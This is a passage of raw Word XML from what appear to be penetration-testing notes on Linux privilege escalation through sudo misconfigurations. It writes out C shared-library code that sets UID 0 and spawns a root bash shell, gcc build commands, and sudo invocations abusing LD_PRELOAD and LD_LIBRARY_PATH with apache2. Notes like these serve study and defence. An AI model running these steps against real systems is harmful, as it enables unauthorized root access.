      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="692"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check to see if we have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">env_keep+=LD_Preload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="692"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1000125"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="354" name="image336.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image336.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId738"/>
                    <a:srcRect b="71074" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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22F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="692"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a file (preload.c) with the following contents:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022F9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022FA">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;sys/types.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022FB">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022FC">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">void _init() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022FD">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unsetenv("LD_PRELOAD");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022FE">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">setresuid(0,0,0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022FF">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system("/bin/bash -p");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002300">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pP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2301">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="692"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will open a shell as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002302">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="692"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Compile preload.c to preload.so:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002303">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="692"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002304">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="692"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run any allowed program using sudo, while setting the LD_PRELOAD environment variable to the full path of the preload.so file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002305">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="692"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_PRELOAD=/tmp/preload.so</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> apache2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002306">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="692"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you should have root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002307">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3454400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="134" name="image128.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image128.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73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2308">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002309">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000230A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000230B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_coxvbt12sz6h" w:id="307"/>
      <w:bookmarkEnd w:id="307"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_Library_PATH (environment variable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000230C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4953000" cy="1143000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="202" name="image169.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image169.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId739"/>
                    <a:srcRect b="79191" l="0" r="34426" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="49530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30D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000230E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_Library_PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000230F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The LD_LIBRARY_PATH environment variable contains a set of directories where</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002310">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shared libraries are searched for first.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002311">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The ldd command can be used to print the shared libraries used by a program:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002312">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd /usr/sbin/apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002313">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By creating a shared library with the same name as one used by a program, and setting LD_LIBRARY_PATH to its parent directory, the program will load our shared library instead</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002314">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002315">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002316">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run ldd against the apache2 program file (or any other file you can run as sudo):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002317">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="814"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd /usr/sbin/apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002318">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="814"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1447800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="278" name="image283.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image283.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId740"/>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2319">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="814"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hijacking shared objects using this method is hit or miss. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Choose one from the list and try it</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (libcrypt.so.1 seems to work well).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000231A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a file libcrypt.c with the following contents:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000231B">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000231C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000231D">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">static void hijack() __attribute__((constructor));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000231E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000231F">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">void hijack() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002320">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unsetenv("LD_LIBRARY_PATH");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002321">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">setresuid(0,0,0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002322">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system("/bin/bash -p");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002323">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
